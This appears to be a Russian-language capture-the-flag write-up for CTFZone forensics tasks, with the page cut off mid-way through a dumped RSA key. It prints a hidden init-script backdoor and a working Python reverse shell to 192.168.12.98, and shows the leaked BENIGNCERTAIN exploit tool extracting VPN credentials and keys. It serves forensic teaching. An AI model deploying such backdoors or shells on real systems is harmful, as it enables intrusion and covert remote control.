\u043e\u0442\u043b\u0438\u0447\u0438\u0442\u044c \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0443 \u043e\u0442 \u0448\u0443\u043c\u0430, \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0432\u044b\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0448\u0438\u0440\u0438\u043d\u0443 \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0447\u0442\u043e\u0431\u044b \u043e\u043d\u0430 \u044f\u0432\u043b\u044f\u043b\u0430\u0441\u044c \u0434\u0435\u043b\u0438\u0442\u0435\u043b\u0435\u043c \u0438\u0441\u0442\u0438\u043d\u043d\u043e\u0439 \u0448\u0438\u0440\u0438\u043d\u044b \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0438, \u0430 \u0432\u044b\u0441\u043e\u0442\u0443 \u0432\u044b\u0431\u0440\u0430\u0442\u044c \u043b\u044e\u0431\u043e\u0439. \u041c\u044b \u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043b\u0438 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435 640 \u043f\u0438\u043a\u0441\u0435\u043b\u0435\u0439 \u0438 \u043d\u0430\u0448\u043b\u0438 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0443:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n<div class=\"spoiler_text\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/df5\/a37\/d94\/df5a37d944df4b72baf087cedab956c5.png\"\/>  <\/div>\n<\/div>\n<p>  \u041e\u0447\u0435\u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0432 \u044d\u0442\u043e\u0439 \u0441\u0435\u043a\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u0430 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0430, \u043d\u043e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043f\u043e\u0434\u043e\u0431\u0440\u0430\u043d\u043e \u043d\u0435\u0432\u0435\u0440\u043d\u043e. \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c 1280:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n<div class=\"spoiler_text\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/c58\/3ee\/685\/c583ee685d0848f5b47ad2a4ca518647.png\"\/>  <\/div>\n<\/div>\n<p>  \u0415\u0449\u0435 \u043b\u0443\u0447\u0448\u0438\u0439 \u044d\u0444\u0444\u0435\u043a\u0442 \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u0438 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043f\u043e\u0434\u0441\u0442\u0440\u043e\u0439\u043a\u0435:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/ace\/a55\/6ab\/acea556ab2d44b569488ee024d4972d9.png\"\/><\/p>\n<p>  \u0412\u043e\u0442 \u0438 \u0444\u043b\u0430\u0433! <\/p>\n<p>  <b>\u041e\u0442\u0432\u0435\u0442:<\/b> <i>ctfzone{7H3_p0w3r_0F_1mAG1Na710N}<\/i><\/p>\n<p>  <font color=\"#6495ED\"><b><\/p>\n<h4>Forensics 500 \u2014 Infected System<\/h4>\n<p><\/b><\/font>  <\/p>\n<blockquote><p><i><b>A.U.R.O.R.A.:<\/b> Lieutenant, system is infected, system is infected, system may be compromised! Lieutenant, what\u2019s happ&#8230;<\/i><\/p><\/blockquote>\n<p>  <b>\u0420\u0435\u0448\u0435\u043d\u0438\u0435:<\/b><\/p>\n<p>  \u041e\u0447\u0435\u043d\u044c \u043c\u043d\u043e\u0433\u0438\u0435 \u043f\u0443\u0442\u0430\u044e\u0442 \u043f\u043e\u043d\u044f\u0442\u0438\u044f \u00ab\u0440\u0430\u0437\u0434\u0435\u043b\u00bb \u0438 \u00ab\u0444\u0430\u0439\u043b\u043e\u0432\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u00bb. \u0417\u0430\u0434\u0430\u043d\u0438\u0435 \u043d\u0430 500 \u043e\u0447\u043a\u043e\u0432 \u043a\u0430\u043a \u0440\u0430\u0437 \u043f\u0440\u043e \u0442\u0430\u043a\u043e\u0439 \u0441\u043b\u0443\u0447\u0430\u0439. \u0412 \u043e\u0431\u0440\u0430\u0437\u0435 \u0438\u043c\u0435\u0435\u0442\u0441\u044f \u0442\u0430\u0431\u043b\u0438\u0446\u0430 \u0440\u0430\u0437\u0434\u0435\u043b\u043e\u0432 DOS \u0441 \u0434\u0432\u0443\u043c\u044f \u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u0440\u0430\u0437\u0434\u0435\u043b\u0430\u043c\u0438 \u2013 Linux, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 Ext4, \u0438 Linux Swap, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u043e\u0431\u043b\u0430\u0441\u0442\u044c \u043f\u043e\u0434\u043a\u0430\u0447\u043a\u0438. \u0415\u0441\u043b\u0438 \u043f\u0440\u0438\u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 Ext4, \u0442\u043e \u0432 \u043d\u0435\u0439 \u043b\u0435\u0433\u043a\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Ubuntu 16.04.1 LTS. \u0421\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u043d\u0430 \u044d\u0442\u043e\u043c \u043f\u0440\u043e\u0441\u0442\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0437\u0430\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441\u043b\u043e\u0436\u043d\u0430\u044f. <br \/>  \u0427\u0442\u043e \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u043e \u0441 \u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 \u2013 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u043a\u0430\u043a\u0438\u0435-\u043b\u0438\u0431\u043e \u043e\u0431\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430 \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u0435\u0434\u0448\u0435\u0433\u043e \u043f\u043e\u043a\u0440\u044b\u0442\u044b \u0442\u0430\u0439\u043d\u043e\u0439. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043f\u043e\u0438\u0441\u043a\u0430 \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0444\u0430\u0439\u043b \/etc\/init.d\/apache2, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0435\u0441\u0442\u044c \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0441\u0442\u0440\u043e\u043a\u0430: <\/p>\n<pre><code class=\"bash\">\/usr\/sbin\/mkinitrd read | base64 -d | python & <\/code><\/pre>\n<p>  \u0415\u0441\u043b\u0438 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0442\u0435\u043a\u0441\u0442 \u0441\u043a\u0440\u0438\u043f\u0442\u0430, \u044d\u0442\u0430 \u0441\u0442\u0440\u043e\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432\u0441\u0435\u0433\u0434\u0430 \u043f\u0440\u0438 \u0441\u0442\u0430\u0440\u0442\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 apache2. \u0412 \u0444\u0430\u0439\u043b\u0435 \/usr\/sbin\/mkinitrd \u043b\u0435\u0433\u043a\u043e \u043d\u0430\u0439\u0442\u0438 \u043a\u043e\u0434, \u043e\u0442\u0432\u0435\u0447\u0430\u044e\u0449\u0438\u0439 \u0437\u0430 \u0447\u0442\u0435\u043d\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \/dev\/sda5 (\u0430 \u044d\u0442\u043e \u0440\u0430\u0437\u0434\u0435\u043b Linux Swap) \u043f\u043e \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u044e 966795264:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">#!\/bin\/sh  [ $# -eq 1 ] || exit 1  check_dep() { \tcmd=&quot;$1&quot; \tcommand -v &quot;$cmd&quot; &gt; \/dev\/null 2&gt; \/dev\/null }  check_dd() # we don't want to use old versions of dd { \tdd if=\/dev\/zero of=\/dev\/null skip=1 count=1 iflag=skip_bytes 2&gt; \/dev\/null \tec=$? \t[ $ec -eq 0 ] }  check_dep dd && check_dd || exit 3  device=&quot;\/dev\/sda5&quot; offset=&quot;966795264&quot; operation=&quot;$1&quot;  if   [ &quot;$operation&quot; = 'write' ]; then \tdd of=&quot;$device&quot; seek=&quot;$offset&quot; oflag=seek_bytes 2&gt; \/dev\/null elif [ &quot;$operation&quot; = 'read' ]; then \tdd if=&quot;$device&quot; skip=&quot;$offset&quot; iflag=skip_bytes 2&gt; \/dev\/null else \texit 2 fi <\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  \u0415\u0441\u043b\u0438 \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u043f\u043e \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u043e\u043c\u0443 \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u044e \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \/dev\/sda5, \u0430 \u0437\u0430\u0442\u0435\u043c \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u0445 \u0438\u0437 Base64, \u0442\u043e \u043f\u0435\u0440\u0435\u0434 \u0433\u043b\u0430\u0437\u0430\u043c\u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u043d\u0435\u0442 \u0441\u043a\u0440\u0438\u043f\u0442, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 Python, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 backconnect-\u0448\u0435\u043b\u043b \u0443\u0437\u043b\u0443 192.168.12.98 (\u043f\u043e\u0440\u0442 31338):  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">#!\/usr\/bin\/env python  import socket, subprocess, os  HOST_PORT = ('192.168.12.98', 31338) FLAG = 'ctfzone{pwn3d-by-ns4_31337}'  while True:      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)      while True:          try:              errno = s.connect_ex(HOST_PORT)          except Exception:              continue           if errno == 0:              break       b_size = len(FLAG)      b = bytearray(b_size)       s.recv_into(b, b_size)      if str(b) == FLAG:          os.dup2(s.fileno(), 0)          os.dup2(s.fileno(), 1)          os.dup2(s.fileno(), 2)           p = subprocess.call(['\/bin\/sh', '-i'])       s.close()<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  \u041f\u0435\u0440\u0435\u0434 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0448\u0435\u043b\u043b\u0430 \u0441\u043a\u0440\u0438\u043f\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u043e\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u044c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0444\u043b\u0430\u0433\u043e\u043c. \u041a\u0430\u043a \u0436\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0431\u043e\u0442\u0430 \u044d\u0442\u043e\u0433\u043e \u0441\u043a\u0440\u0438\u043f\u0442\u0430, \u0435\u0441\u043b\u0438 \u043e\u043d \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 \u0441 \u043e\u0431\u043b\u0430\u0441\u0442\u044c\u044e \u043f\u043e\u0434\u043a\u0430\u0447\u043a\u0438? \u0420\u0430\u0437\u043c\u0435\u0440 \u0441\u0430\u043c\u043e\u0433\u043e \u0440\u0430\u0437\u0434\u0435\u043b\u0430 \u2013 1071644672 \u0431\u0430\u0439\u0442\u0430, \u0430 \u0440\u0430\u0437\u0434\u0435\u043b \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u043f\u043e\u0434\u043a\u0430\u0447\u043a\u0438 \u0432 \u044d\u0442\u043e\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0435 \u2013 236031 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430, \u043a\u0430\u0436\u0434\u0430\u044f \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u0438\u043c\u0435\u0435\u0442 \u0440\u0430\u0437\u043c\u0435\u0440 4096 \u0431\u0430\u0439\u0442, \u0438\u0442\u043e\u0433\u043e 966782976 \u0431\u0430\u0439\u0442. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043c\u044b \u0438\u043c\u0435\u0435\u043c 104861696 \u0431\u0430\u0439\u0442 (\u043e\u043a\u043e\u043b\u043e 100 \u043c\u0435\u0433\u0430\u0431\u0430\u0439\u0442) \u043c\u0435\u0436\u0434\u0443 \u043a\u043e\u043d\u0446\u043e\u043c \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u043f\u043e\u0434\u043a\u0430\u0447\u043a\u0438 \u0438 \u043a\u043e\u043d\u0446\u043e\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0430, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u044d\u0442\u0430 \u043e\u0431\u043b\u0430\u0441\u0442\u044c \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0438\u0447\u0435\u043c, \u043a\u0440\u043e\u043c\u0435 \u0431\u0435\u043a\u0434\u043e\u0440\u0430, \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f. \u0421\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0432 \u044d\u0442\u043e\u0439 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u043c\u043e\u0436\u043d\u043e \u0445\u0440\u0430\u043d\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435 \u0431\u0443\u0434\u0443\u0442 \u0437\u0430\u0442\u0435\u0440\u0442\u044b \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u043e\u043c \u043f\u0430\u043c\u044f\u0442\u0438 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u043f\u043e\u0434\u043a\u0430\u0447\u043a\u0438.<\/p>\n<p>  <b>\u041e\u0442\u0432\u0435\u0442:<\/b> <i>ctfzone{pwn3d-by-ns4_31337}<\/i><\/p>\n<p>  <font color=\"#6495ED\"><b><\/p>\n<h4>Forensics 1000 \u2014 Have I been pwned?<\/h4>\n<p><\/b><\/font>  <\/p>\n<blockquote><p><i><b>Captain Picard:<\/b> Lieutenant, be careful, Big Brother is watching you\u2026<\/i><\/p><\/blockquote>\n<p>  <b>\u0420\u0435\u0448\u0435\u043d\u0438\u0435:<\/b><\/p>\n<p>  \u0423\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f PCAP \u0434\u0430\u043c\u043f \u0442\u0440\u0430\u0444\u0444\u0438\u043a\u0430. \u0417\u0430\u0434\u0430\u043d\u0438\u044f \u043d\u0430 1000 \u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0438\u0441\u044c \u0441 \u043e\u0441\u043e\u0431\u044b\u043c \u0442\u0440\u0435\u043f\u0435\u0442\u043e\u043c, \u0442\u0430\u043a \u043a\u0430\u043a \u043d\u0430\u043c \u0445\u043e\u0442\u0435\u043b\u043e\u0441\u044c \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u0442\u044c \u0447\u0442\u043e-\u043d\u0438\u0431\u0443\u0434\u044c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435 \u0438 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0435. \u0414\u043b\u044f \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Forensics \u0431\u044b\u043b\u043e \u0440\u0435\u0448\u0435\u043d\u043e \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u0442\u044c \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0441 \u0443\u0447\u0435\u0442\u043e\u043c \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 \u0443\u0442\u0435\u0447\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430 BENIGNCERTAIN \u043f\u043e\u0434 CISCO PIX. \u0412 \u0445\u043e\u0434\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 BENIGNCERTAIN \u0443\u0434\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043e\u0433\u0440\u043e\u043c\u043d\u0443\u044e \u0447\u0430\u0441\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 CISCO PIX, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u044b\u0435 \u043a\u043b\u044e\u0447\u0438, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u0442\u044c \u0442\u0440\u0430\u0444\u0438\u043a.<\/p>\n<p>  \u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043d\u0430\u0439\u0442\u0438 \u043f\u0430\u043a\u0435\u0442\u044b \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 ISAKMP:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/407\/bc6\/b01\/407bc6b0128146d384e68b4b70e0d0be.png\"\/><\/p>\n<p>  \u041f\u0430\u043a\u0435\u0442 \u043e\u0442 10.1.3.52, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 payload, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u00abbc-genpkt\u00bb:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/d05\/994\/fe9\/d05994fe91214f4e86c12caeb6a0871e.png\"\/><\/p>\n<p>  \u0410 \u0432\u043e\u0442 \u043f\u0430\u043a\u0435\u0442 \u043e\u0442 \u0443\u0437\u043b\u0430 \u00ab10.1.2.12\u00bb \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0447\u0430\u0441\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043e\u0442\u0434\u0430\u0435\u0442 PIX \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/90e\/703\/737\/90e703737eaa49cb86291e98cd5583e0.png\"\/><\/p>\n<p>  \u041e\u0447\u0435\u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u043d\u0430\u0441 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u0435\u0442 \u043f\u0430\u043a\u0435\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0434\u0435\u0442 \u043e\u0442 CISCO PIX, \u0442.\u043a. \u043e\u043d \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u00abPrivate Key\u00bb. \u0421\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c ISAKMP \u043f\u0430\u043a\u0435\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0434\u0435\u0442 \u043e\u0442 10.1.2.12 \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 \u00abraw\u00bb, \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u043c \u0435\u0433\u043e \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0430 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 \u00abbc-parser\u00bb, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0434\u0435\u0442 \u0432 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0442\u0435 \u0441 <a href=\"https:\/\/github.com\/adamcaudill\/EquationGroupLeak\/tree\/master\/Firewall\/TOOLS\/BenignCertain\/\">EquationGroupLeak<\/a>.<\/p>\n<p>  \u041a\u043e\u043c\u0430\u043d\u0434\u0430:  <\/p>\n<pre><code class=\"bash\">.\/bc-parser packet.raw <\/code><\/pre>\n<p>  \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">bc-parser<\/b><\/p>\n<div class=\"spoiler_text\">BENIGNCERTAIN parser v1.0<\/p>\n<p>  Parsing file packet<\/p>\n<p>  Possible PIX version(s):<\/p>\n<p>  Cisco PIX 6.3(4)<\/p>\n<p>  *** Couldn&#8217;t determine interface used by BENIGNCERTAIN ***<\/p>\n<p>  =======================================================================<\/p>\n<p>  Stack separator structure at offset 0x0254, size 0x98 bytes:<\/p>\n<p>  =======================================================================<\/p>\n<p>  ISAKMP enable structure at offset 0x02ec, size 0x218 bytes:<\/p>\n<p>  *** ISAKMP enabled on 1 interface ***<\/p>\n<p>  =======================================================================<\/p>\n<p>  Unknown structure at offset 0x0504, size 0x30 bytes:<\/p>\n<p>  =======================================================================<\/p>\n<p>  ISAKMP policy structure at offset 0x0534, size 0x38 bytes (1 of at least 1 policies):<\/p>\n<p>  Priority: 0x000a [10]<br \/>   Cipher: 0x0007 [AES]<br \/>   AES keysize: 0x0100 [256-bits]<br \/>   Auth: 0x0003 [RSA signature]<br \/>   Hash: 0x0002 [SHA]<br \/>   Group: 0x0002 [1024-bit]<br \/>   Lifetime: 0x00015180 [86400 seconds]<\/p>\n<p>  =======================================================================<\/p>\n<p>  VPN group structure at offset 0x056c, size 0x600 bytes (1 of 1 groups):<\/p>\n<p>  Group name: 12345<br \/>   Pool name: vpnpool1<br \/>   Domain name: spaceship.ctf<br \/>   Password: 12345<br \/>   Primary DNS: 192.168.7.1 <br \/>   Primary WINS: 192.168.7.1 <br \/>   Idle-time: 0x00000708 [1800 seconds]<\/p>\n<p>  =======================================================================<\/p>\n<p>  Unknown structure at offset 0x0b6c, size 0x28 bytes:<\/p>\n<p>  String: listen\/ssh_0<\/p>\n<p>  =======================================================================<\/p>\n<p>  Per-thread stack structure at offset 0x0b94, size 0x818 bytes:<\/p>\n<p>  *** Target allows SSH access (on port 22) ***<br \/>   *** on the outside interface ***<\/p>\n<p>  *** Couldn&#8217;t determine the interface used by BC ***<\/p>\n<p>  =======================================================================<\/p>\n<p>  Stack separator structure at offset 0x13ac, size 0x98 bytes:<\/p>\n<p>  =======================================================================<\/p>\n<p>  IP\/netmask structure at offset 0x1444, size 0x30 bytes:<\/p>\n<p>  IP Address: 10.0.0.0<br \/>   Netmask: 255.0.0.0<\/p>\n<p>  IP\/netmask probably associated with preceding thread<\/p>\n<p>  =======================================================================<\/p>\n<p>  Unknown structure at offset 0x1474, size 0x30 bytes:<\/p>\n<p>  =======================================================================<\/p>\n<p>  Unknown structure at offset 0x14a4, size 0x40 bytes:<\/p>\n<p>  =======================================================================<\/p>\n<p>  Hostname structure at offset 0x14e4, size 0x30 bytes:<\/p>\n<p>  Possible hostname: privateVPN.spaceship.ctf<\/p>\n<p>  =======================================================================<\/p>\n<p>  RSA private key structure at offset 0x1514, size 0x4d8 bytes:<\/p>\n<p>  *** Found probable RSA private key ***<\/p>\n<p>  To validate the RSA key using &#8216;openssl&#8217;:<\/p>\n<p>  openssl rsa -inform DER -text -noout -check \\<br \/>   -in packet.rsa_priv_1.der<\/p>\n<p>  =======================================================================<\/p>\n<p>  RSA public key structure at offset 0x19ec, size 0x140 bytes:<\/p>\n<p>  *** Found probable RSA public key ***<\/p>\n<p>  To validate the RSA key using &#8216;openssl&#8217;:<\/p>\n<p>  openssl rsa -inform DER -text -noout -pubin \\<br \/>   -in packet.rsa_pub_1.der<\/p>\n<p>  =======================================================================<\/p>\n<p>  *** Partial structure at offset 0x1b2c (0x86c of 0x2018 bytes):<\/p>\n<p>  [Not parsed]<\/p>\n<p>  =======================================================================<\/p>\n<p>  &lt;&lt;&lt;&lt;&gt;&gt;&gt;&gt;<\/p><\/div>\n<\/div>\n<p>  \u0421\u043c\u043e\u0442\u0440\u0438\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 DER:<\/p>\n<p>  \u041a\u043e\u043c\u0430\u043d\u0434\u0430:  <\/p>\n<pre><code class=\"bash\">openssl rsa -inform DER -text -in packet.rsa_priv_1.der <\/code><\/pre>\n<p>  \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">Private-Key: (2048 bit) modulus:     00:cc:33:bf:61:d5:c3:06:cd:4f:49:25:39:81:d1:     39:31:be:38:87:27:b6:98:a8:64:cd:af:3c:0f:7a:     25:dd:da:36:f3:f4:13:44:dc:13:10:5d:61:83:d9:     74:00:78:18:54:04:a2:57:f5:22:8b:3d:a5:20:c2:     06:c4:76:f7:25:b2:3a:cc:ef:61:98:87:b7:40:d5:     0f:ce:1e:b5:16:b2:af:62:80:0b:04:fc:f0:f8:e1:     23:fa:ed:30:2a:4d:8c:59:11:bf:0a:08:f5:ae:58:     2e:93:8e:03:cd:c3:05:e6:7d:18:29:1f:4a:4c:6b:     e6:3d:71:21:ba:a5:bb:6f:80:fd:58:6b:54:13:89:     d3:ea:82:45:eb:7a:94:c6:db:44:3a:b7:be:8e:09:     0a:65:7b:37:06:95:5e:fa:82:d4:17:dd:63:37:e3:     